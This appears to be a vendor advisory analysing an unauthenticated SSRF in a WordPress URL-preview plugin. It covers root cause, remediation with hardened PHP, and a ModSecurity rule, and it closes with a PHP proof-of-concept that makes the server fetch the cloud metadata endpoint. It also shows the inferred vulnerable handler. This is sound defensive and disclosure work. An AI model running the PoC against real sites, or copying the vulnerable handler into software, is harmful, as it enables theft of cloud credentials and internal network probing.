Atomic Edge analysis of CVE-2026-12100 (metadata-based):
The URL Preview plugin (slug: link-preview) version 1.0 for WordPress contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. This flaw allows an attacker to force the WordPress server to make arbitrary HTTP requests to internal or external systems. The vulnerability carries a CVSS score of 7.2 (High) due to network-based, low-complexity exploitation without authentication.
Root Cause:
Based on the CWE-918 classification and the description, Atomic Edge analysis infers that the plugin accepts a user-supplied ‘url’ parameter through an AJAX handler, REST endpoint, or form submission. The plugin likely passes this URL directly to a server-side HTTP fetching function (e.g., wp_remote_get, curl_exec, file_get_contents) without validating that the destination is a legitimate, public URL. No hostname whitelist, IP range restriction, or protocol validation is applied. This inference stems from the specific mention of the ‘url’ parameter and the lack of authentication requirements. Without access to the source code, this root cause cannot be confirmed, but it aligns with common SSRF patterns in WordPress plugins that generate link previews.
Exploitation:
An unauthenticated attacker sends an HTTP GET or POST request to the plugin’s endpoint, typically `wp-admin/admin-ajax.php` with the plugin’s AJAX action. The advisory metadata does not name that action; `link_preview_fetch` and `url_preview` are inferences from the plugin slug and must be confirmed against the plugin source (unauthenticated reach implies the handler is registered on a `wp_ajax_nopriv_*` hook). The attacker sets the ‘url’ parameter to an internal address or service, such as `http://169.254.169.254/latest/meta-data/` (cloud metadata) or `http://127.0.0.1/wp-admin/admin-ajax.php` (loopback). The server fetches the URL; if the handler returns the fetched body, the response discloses its contents, and if it returns only an extracted title or Open Graph fields, the flaw remains usable to map internal hosts and ports through differences in response time and error messages. No authentication, nonce, or capability check is required.
Remediation:
To fix this SSRF vulnerability, the plugin must validate the ‘url’ parameter before making any outbound HTTP request. The developer should enforce an allowlist of permitted URL schemes (HTTPS only, or HTTP and HTTPS at most, never file:, gopher:, ftp: or php: stream wrappers), reject credentials in the authority part, and block private and reserved destination addresses. `wp_safe_remote_get()` applies `wp_http_validate_url()`, which resolves the host and rejects loopback, 0.0.0.0/8 and the RFC 1918 ranges; it does not reject 169.254.0.0/16, the link-local range used by cloud metadata services, and it skips the address check when the host matches the site’s own home URL, so a custom IP filter is still needed alongside it. Redirects must be disabled or every redirect target re-validated, since a public host can answer with a 302 to an internal address, and the check should account for a hostname resolving to a different address between validation and fetch (DNS rebinding): pin the connection to a validated address, or route the fetch through an egress proxy that enforces the same policy. Additionally, a nonce check (`check_ajax_referer()`) and a capability check must be added to the AJAX handler, and the `wp_ajax_nopriv_` registration removed so that unauthenticated visitors cannot reach it at all.
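The handler pattern the Root Cause section infers, beside a hardened version implementing the Remediation section, as an added illustration rather than the plugin’s own code (the plugin source was not available; the action name `link_preview_fetch`, the `lp_preview` nonce action, the `edit_posts` capability and all `lp_*` function names are assumptions):

```php
<?php
// Added example, not code from the URL Preview plugin (its source was not available).
// 'link_preview_fetch', 'lp_preview', the edit_posts capability and every lp_* name
// are assumptions. Top: the inferred vulnerable handler. Bottom: a hardened version.

// ---- Inferred vulnerable pattern (CWE-918) ---------------------------------------
// Registered for unauthenticated visitors (nopriv), no nonce, no capability check, and
// the user-supplied URL goes straight to wp_remote_get(), which follows redirects and
// accepts any host. Whatever the server fetched is echoed back to the caller.
add_action( 'wp_ajax_nopriv_link_preview_fetch', 'lp_fetch_preview_vulnerable' );
add_action( 'wp_ajax_link_preview_fetch',        'lp_fetch_preview_vulnerable' );
function lp_fetch_preview_vulnerable() {
	$url      = isset( $_POST['url'] ) ? $_POST['url'] : '';
	$response = wp_remote_get( $url );
	wp_send_json_success( wp_remote_retrieve_body( $response ) );
}

// ---- Hardened handler ------------------------------------------------------------
// Only the authenticated hook is registered; nonce and capability checks gate the
// request; the destination is validated on scheme, credentials and every resolved
// address; redirects are disabled so a public host cannot bounce the fetch to an
// internal one; and only the extracted title is returned, not the raw body.
add_action( 'wp_ajax_link_preview_fetch', 'lp_fetch_preview_safe' );
function lp_fetch_preview_safe() {
	check_ajax_referer( 'lp_preview', 'nonce' );
	if ( ! current_user_can( 'edit_posts' ) ) {
		wp_send_json_error( 'forbidden', 403 );
	}
	$url = isset( $_POST['url'] ) ? esc_url_raw( wp_unslash( $_POST['url'] ), array( 'https' ) ) : '';
	if ( '' === $url || ! lp_is_public_https_url( $url ) ) {
		wp_send_json_error( 'invalid url', 400 );
	}
	$response = wp_safe_remote_get(
		$url,
		array(
			'timeout'             => 5,
			'redirection'         => 0,          // never follow a redirect
			'limit_response_size' => 512 * 1024, // cap what we are willing to pull in
		)
	);
	if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
		wp_send_json_error( 'fetch failed', 502 );
	}
	wp_send_json_success( array( 'title' => lp_extract_title( wp_remote_retrieve_body( $response ) ) ) );
}

// True only for https:// URLs without embedded credentials whose host resolves
// exclusively to public addresses. wp_http_validate_url() is applied too, but it does
// not reject 169.254.0.0/16, so the filter_var() pass with NO_PRIV_RANGE|NO_RES_RANGE
// is what actually blocks the cloud metadata address. Residual risk: the fetch resolves
// the name a second time (DNS rebinding); pin the address or use an egress proxy if
// that matters in your deployment.
function lp_is_public_https_url( $url ) {
	$parts = wp_parse_url( $url );
	if ( empty( $parts['scheme'] ) || 'https' !== strtolower( $parts['scheme'] ) || empty( $parts['host'] ) ) {
		return false;
	}
	if ( isset( $parts['user'] ) || isset( $parts['pass'] ) ) {
		return false;
	}
	if ( ! wp_http_validate_url( $url ) ) {
		return false;
	}
	$host = trim( $parts['host'], '[]' ); // IPv6 literals arrive bracketed
	$ips  = array();
	if ( filter_var( $host, FILTER_VALIDATE_IP ) ) {
		$ips[] = $host; // IP literal: nothing to resolve
	} else {
		foreach ( (array) dns_get_record( $host, DNS_A | DNS_AAAA ) as $rr ) {
			if ( isset( $rr['ip'] ) )   { $ips[] = $rr['ip']; }
			if ( isset( $rr['ipv6'] ) ) { $ips[] = $rr['ipv6']; }
		}
	}
	if ( empty( $ips ) ) {
		return false;
	}
	foreach ( $ips as $ip ) {
		if ( false === filter_var( $ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE ) ) {
			return false; // any private/reserved address in the answer rejects the URL
		}
	}
	return true;
}

function lp_extract_title( $html ) {
	return preg_match( '#<title[^>]*>(.*?)</title>#is', $html, $m )
		? sanitize_text_field( wp_strip_all_tags( $m[1] ) )
		: '';
}
```

Load this from a plugin file, pass `wp_create_nonce( 'lp_preview' )` as the `nonce` POST field from the editor script, and confirm with the proof-of-concept further down that a request for `http://169.254.169.254/latest/meta-data/` now gets a 400 without the server opening any outbound connection.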
Impact:
Successful exploitation enables an attacker to probe internal network services, steal cloud instance metadata (e.g., AWS IAM credentials), interact with internal APIs, and potentially execute administrative actions on local WordPress resources via loopback requests. Although the CVSS confidentiality and integrity impact are rated Low, the SSRF can expose high-value secrets depending on the environment. This vulnerability poses a critical risk to sites hosted on cloud platforms with metadata services or with sensitive internal services.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-12100 (metadata-based)
# Block SSRF attempts via AJAX action 'link_preview_fetch' with internal IPs or reserved hosts
# Assumes vulnerable AJAX action based on plugin slug 'link-preview'; confirm the real action name before deploying
# The rule chains to match the specific action and block common SSRF target patterns.
# REQUEST_FILENAME is used instead of REQUEST_URI so that a query string does not defeat the match;
# ARGS instead of ARGS_POST so the action and url are caught whether they arrive via GET or POST;
# dots in the address patterns are escaped and IPv6 literals are matched in their bracketed URL form.
# Only the chain starter carries id/msg/severity/tag; ModSecurity rejects metadata actions on chained rules.
# This is a denylist: decimal or hex IP encodings, DNS names that resolve to internal addresses, and
# redirects from a public host are not caught here and need the server-side fix.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-12100 SSRF via URL Preview plugin AJAX',severity:'CRITICAL',tag:'CVE-2026-12100'"
    SecRule ARGS:action "@streq link_preview_fetch" "t:none,chain"
        SecRule ARGS:url "@rx ^https?://(localhost|127\.\d+\.\d+\.\d+|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|0\.0\.0\.0|169\.254\.|\[::1\]|\[f[cd][0-9a-f]{2}:|\[fe80:)" \
            "t:none,t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12100 - URL Preview <= 1.0 - Unauthenticated Server-Side Request Forgery via 'url' Parameter
// This PoC demonstrates SSRF exploitation against the URL Preview WordPress plugin.
// It assumes the vulnerable AJAX action is 'link_preview_fetch' (inferred from plugin slug 'link-preview').
// The target URL can be an internal service like cloud metadata endpoint.
$target_url = 'http://169.254.169.254/latest/meta-data/'; // AWS metadata endpoint
$wp_site = 'http://example.com'; // Change to target WordPress site
$ajax_url = $wp_site . '/wp-admin/admin-ajax.php';
$action = 'link_preview_fetch'; // Inferred AJAX action; may need adjustment
$payload = [
'action' => $action,
'url' => $target_url
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$curl_error = curl_error($ch);
curl_close($ch);
// admin-ajax.php answers an unregistered action with HTTP 400 and a body of "0"; that means
// the inferred action name is wrong, not that the target is patched.
if ($http_code == 200 && !empty($response) && $response !== '0') {
    echo "[+] SSRF successful. Response from internal service:\n";
    echo $response;
} else {
    echo "[-] Exploit failed. HTTP code: $http_code\n";
    if ($curl_error !== '') {
        echo "[-] cURL error: $curl_error\n";
    }
    echo "[-] Response: $response\n";
}
?>